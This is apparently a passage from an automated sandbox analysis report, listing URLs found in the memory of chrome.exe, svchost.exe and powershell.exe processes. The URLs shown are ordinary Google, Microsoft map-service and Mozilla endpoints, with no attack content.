Source: chrome.exe, 0000002D.00000002.1775881875.00005B0400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690364771.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776679945.00005B0400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 0000002D.00000002.1777350807.00005B0400EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 0000002D.00000002.1777350807.00005B0400EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 0000002D.00000002.1777350807.00005B0400EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 0000002D.00000003.1671766690.00005B04015E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000002D.00000002.1747122963.000001F7D94A7000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777604042.00005B0400F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1845882949.00005B0401728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777724775.00005B0400F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1790205773.00005B0401260000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776282589.00005B0400CF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 0000002D.00000003.1689534133.00005B0401434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1671766690.00005B04015E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 0000002D.00000002.1764403818.00005B04008C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromemodelexecution-pa.googleapis.com/v1:Execute?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
Source: chrome.exe, 0000002D.00000002.1764403818.00005B04008C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromemodelquality-pa.googleapis.com/v1:LogAiData?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 0000002D.00000002.1762167783.00005B0400190000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 0000002D.00000002.1772750526.00005B0400AA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/category/extensions
Source: chrome.exe, 0000002D.00000002.1772750526.00005B0400AA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/category/themes
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 0000002D.00000003.1641683702.00006B88000DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 0000002D.00000002.1762131498.00005B0400180000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1772672941.00005B0400A64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1762167783.00005B0400190000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1779428372.00005B040116C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763123022.00005B04004F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 0000002D.00000002.1767884735.00005B0400928000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 0000002D.00000002.1767884735.00005B0400928000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 0000002D.00000002.1767884735.00005B0400928000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 0000002D.00000002.1772224335.00005B0400978000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
Source: 68qi5p.27.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: 68qi5p.27.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000008.00000002.984922811.000001552BD36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.984922811.000001552BD36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.984922811.000001552BD36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: chrome.exe, 0000002D.00000002.1777650410.00005B0400F57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/gws/cdt1
Source: chrome.exe, 0000002D.00000002.1777650410.00005B0400F57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/gws/cdt1rj
Source: chrome.exe, 0000002D.00000002.1763300284.00005B040054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369690877.0000021485059000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 0000000F.00000002.1369777595.0000021485063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1369040945.0000021485041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368831638.0000021485062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368694459.000002148506E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1369004805.000002148505A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369625543.0000021485042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369857708.0000021485070000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000F.00000003.1368694459.000002148506E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369857708.0000021485070000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000F.00000002.1369813385.0000021485068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368811053.0000021485067000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000F.00000003.1368640120.0000021485075000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369879088.0000021485077000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000F.00000002.1369777595.0000021485063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368831638.0000021485062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1369004805.000002148505A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369572980.000002148502B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000F.00000002.1369813385.0000021485068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369572980.000002148502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368811053.0000021485067000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000F.00000002.1369777595.0000021485063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368831638.0000021485062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000F.00000003.1369040945.0000021485041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369625543.0000021485042000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000F.00000002.1369777595.0000021485063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368831638.0000021485062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 0000002D.00000002.1793807072.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777183033.00005B0400E94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1779428372.00005B040116C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777183033.00005B0400E94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1779009107.00005B04010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777183033.00005B0400E94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default7
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
Source: chrome.exe, 0000002D.00000002.1775881875.00005B0400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690364771.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776679945.00005B0400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002D.00000002.1775881875.00005B0400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690364771.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776679945.00005B0400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002D.00000002.1772672941.00005B0400A64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 0000002D.00000002.1764009183.00005B040075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1792443333.00005B0401370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1778607856.00005B0401040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1779009107.00005B04010F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 0000002D.00000002.1778607856.00005B0401040000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp$
Source: chrome.exe, 0000002D.00000002.1792443333.00005B0401370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1778607856.00005B0401040000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webappHandler
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1789787283.00005B040121C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default0A
Source: chrome.exe, 0000002D.00000002.1775881875.00005B0400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690364771.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776679945.00005B0400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002D.00000002.1793807072.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1778715418.00005B0401084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1792443333.00005B0401370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763959544.00005B04006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1789787283.00005B040121C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1779009107.00005B04010F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 0000002D.00000002.1792443333.00005B0401370000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp$
Source: chrome.exe, 0000002D.00000002.1763959544.00005B04006EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webappHandler
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763959544.00005B04006EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002D.00000002.1775881875.00005B0400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690364771.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776679945.00005B0400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 0000002D.00000002.1772672941.00005B0400A64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1778715418.00005B0401084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1793807072.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1778715418.00005B0401084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1761475143.00005B040005C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 0000002D.00000002.1789787283.00005B040121C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777532396.00005B0400F0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002D.00000002.1792443333.00005B0401370000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_defaulter7
Source: svchost.exe, 0000000F.00000003.1368616075.0000021485034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000F.00000002.1369625543.0000021485042000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000F.00000002.1369777595.0000021485063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368831638.0000021485062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000F.00000003.1369040945.0000021485041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368896974.000002148505E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369625543.0000021485042000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000F.00000002.1369690877.0000021485059000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000F.00000003.1368616075.0000021485034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 0000000F.00000002.1369813385.0000021485068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369572980.000002148502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368811053.0000021485067000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: chrome.exe, 0000002D.00000003.1690575124.00005B0401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690364771.00005B0401858000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690150500.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.google.com/icons?selected=Material
Source: svchost.exe, 0000000E.00000003.1203134436.0000024B72033000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 0000000E.00000003.1203134436.0000024B72000000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: chrome.exe, 0000002D.00000002.1777350807.00005B0400EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
